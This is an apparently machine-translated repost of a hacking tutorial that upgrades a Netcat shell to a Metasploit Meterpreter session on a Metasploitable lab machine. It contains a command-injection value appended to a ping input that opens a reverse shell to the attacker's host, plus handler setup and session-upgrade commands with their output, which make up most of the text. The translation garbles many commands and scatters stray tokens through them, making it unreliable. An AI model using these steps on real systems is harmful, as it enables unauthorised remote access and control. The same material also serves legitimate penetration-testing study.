قالب وردپرس درنا توس
Home / Tips and Tricks / How to Increase a Netcart Shell for a Meterpreter Session for More Power and Control «Null Byte :: WonderHowTo

How to Increase a Netcart Shell for a Meterpreter Session for More Power and Control «Null Byte :: WonderHowTo



Poping a shell is often a hacker's main target and can be exciting if executed correctly, but sometimes they have their limitations. Metasploit's Meterpreter may not require any introduction, but this powerful, dynamic payload can beat a leg higher than normal shells. To prove this, we'll show you how to put a normal command shell into a meterpreter session.

Shell vs. Meterpreter

A shell is basically an interface that serves as an abbreviation to the commands of an operation system. Hacking is mainly referred to as two types of shells: binding shells and inverted shells.

A binding shell effectively binds to a specific port on the target, and the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, establishes an active connection between the target computer and the attacking computer, where a listener waits for incoming connections.

Command shells are a great way to really get to grips with the goal, but not always the best option. Typically, they are limited to the privileges of the user who initiated the shell, so the performance associated with root-level access is not always available.

Recommended on Amazon: Metasploit: The Penetration Tester's Guide [19659007] The Meterpreter allows us to perform locally executed exploit modules and exploits on the target after the exploit. It uses encrypted communication methods, and nothing is written to disk during operation. This makes it a suitable weapon that leaves little to no evidence. The Meterpreter offers a variety of other features and is highly expandable, making it an excellent addition to any hacker arsenal.

Step 1: Start a Listener

First, start Metasploit. Enter msfconsole in the terminal and we will be greeted by a nice little welcome banner after loading. We will use a great feature of Metasploit, the ability to set up a universal listener that supports a variety of different types of shells. To load the module, type the following:

  use exploit / multi / handler 

Next, you must specify the listening host and port by using the IP address of our local computer and any port number. We also need to adjust the payload – the versatile reverse TCP shell is an excellent choice.

  Set msf5 exploit (multi / handler)> Lhost 172.16.1.100
lhost => 172.16.1.100
msf5 Exploit (Multi / Handler)> Sets port 1234
lport => 1234
msf5 exploit (multi / handler)> set payload linux / x86 / shell / reverse_tcp
payload => linux / x86 / shell / reverse_tcp 

Enter options at the command prompt to verify that our settings are correct.

  msf5 exploit (multi / handler)> options

Module Options (Exploit / Multi / Handler):

Name Current setting Required description
---- --------------- -------- -----------

Payload options (linux / x86 / shell / reverse_tcp):

Name Current setting Required description
---- --------------- -------- -----------
LHOST 172.16.1.100 yes The listening address (an interface can be specified)
LPORT 1234 yes The listport

Exploit target:

ID name
- ----
0 Wildcard Target 

It looks like we are good. Enter run to start the handler, and now he is ready to wait for an incoming connection.

  msf5 exploit (multi / handler)> run

[*] Reverse TCP handler started at 172.16.1.100:1234. [19659017(Step2:GetShellwithNetcat

) Netcat is a powerful network utility that is often used to troubleshoot connectivity issues. However, it can also be used as a backdoor via command shells. We can use this tool together with a command injection injection vulnerability to create a shell and connect to our local computer. If all goes well, the previously set handler catches the shell and we can issue commands.

This vulnerability could allow us to attach system commands to the ping utility input.

  127.0.0.1 && nc 172.16.1.100 1234 -e / bin / sh 

Here we used the Netcat command to create a shell and connect to our local machine on port 1234:

After a brief moment in the terminal with our handler, we see that a session is open. We can now issue commands such as id and uname -a to verify this.

  [*] Send Level (36 bytes) to 172.16.1.102
[*] Command Shell Session 1 opened at 2019-01-29 15:28:28 -0600 (172.16.1.100:1234 -> 172.16.1.102:53462)

I would
uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
uname -a
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux 

Finally we have to start this session with Ctrl-Z in the background of Y for confirmation.

  ^ Z
Background session 1? [y/N] y
msf5 Exploit (Multi / Handler)> 

Recommended on Amazon: Instant Netcat Starter

Step 3: Increase Shell Meter Count Session

Now that we have reached a session on the target, we can do that Modify modest shell to a full meterpreter session. This allows greater flexibility in interacting with the target.

At the command prompt, type session to see all currently open sessions. Below we see the session we opened earlier, along with ID, shell type and connection information.

  msf5 exploit (multi / handler)> sessions

Active sessions
=================

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 shell x86 / linux 172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102) 

The easiest way to convert a regular session into a meter-meter session is to use the flag -u . Issue the session command with the appropriate ID and watch the magic happen.

  msf5 exploit (multi / handler)> sessions -u 1
[*] Running & # 39; post / multi / manage / shell_to_meterpreter & # 39; in session (s): [1]

[*]   Update the session ID: 1
[*] Start exploit / multi / handler
[*] The reverse TCP handler was started at 172.16.1.100:4433
[*] Send Level (914728 bytes) to 172.16.1.102
[*] Meterpreter Session 2 opened at 2019-01-29 15:30:28 -0600 (172.16.1.100:4433 -> 172.16.1.102:42790)
[*] Command Memory Progress: 100.00% (773/773 bytes) 

It now seems that nothing has happened, but in fact we have a Meterpreter session open in the background - this does not automatically lead us to it. If we issue the command again our new Meterpreter session with the ID 2 will be listed. We can then use the flag -i to interact with it.

  msf5 exploit (multi / handler)> sessions -i 2
[*] Start of interaction with 2 ...

Meterpreter> 

And now we have a Meterpreter shell. However, there is another way to raise a normal shell to a meterpreter session that is similar to the method described above, and to manually use the shell_to_meterpreter post-use module.

Alternative method to raise the shell to the meterpreter session

To load the shell, type the following:

  Use post / multi / manage / shell_to_meterpreter 

You only need to use the existing one Specify a session that you want to update. After that we can only display the current settings with the command .

  msf5 post (multi / manage / shell_to_meterpreter)> Set Session 1
Session => 1
msf5 post (multi / manage / shell_to_meterpreter)> options

Module options (post / multi / manage / shell_to_meterpreter):

Name Current setting Required description
---- --------------- -------- -----------
HANDLER true yes Start an exploit / multi / handler to get the connection
LHOST No IP address of the host that receives the connection from the payload (tries to detect automatically).
LPORT 4433 yes Port for the payload to which a connection is to be made.
SESSION 1 yes The session on which this module is to be executed. [196909010] Enter  run  to start it. 

  msf5 post (multi / manage / shell_to_meterpreter)> run

[*] Update Session ID: 1
[*] Start exploit / multi / handler
[*] The reverse TCP handler was started at 172.16.1.100:4433
[*] Send Level (914728 bytes) to 172.16.1.102
[*] Meterpreter Session 3 opened at 2019-01-29 15:34:16 -0600 (172.16.1.100:4433 -> 172.16.1.102:59832)
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post-module execution completed 

Again, the new session opens in the background, so we need to issue the session command to get the correct ID.

  msf5 post (multi / manage / shell_to_meterpreter)> sessions

Active sessions
=================

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 Shell x86 / Linux 172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
3 Meterpreter x86 / linux 172.16.1.100:4433 -> 172.16.1.102:59832 (172.16.1.102) 

We can see that this new meterpreter session has an ID of 3. Now we can interact with her. [19659010] msf5 post (multi / manage / shell_to_meterspreter)> sessions -i 3
[*] Start of interaction with 3 ...

Meterpreter>

We now have a Meterpreter shell, and from here the sky is the limit.

Wrapping Thing's

In this tutorial, we learned how to use a normal old command shell and raise it to the Meterpreter status. We used a Netcat shell here, but any other kind of shell should work with this method. The Meterpreter offers a lot of power and control over every target. So go out and continue.

Cover image of StockSnap / Pixabay; Screenshots of drd_ / zero byte

Source link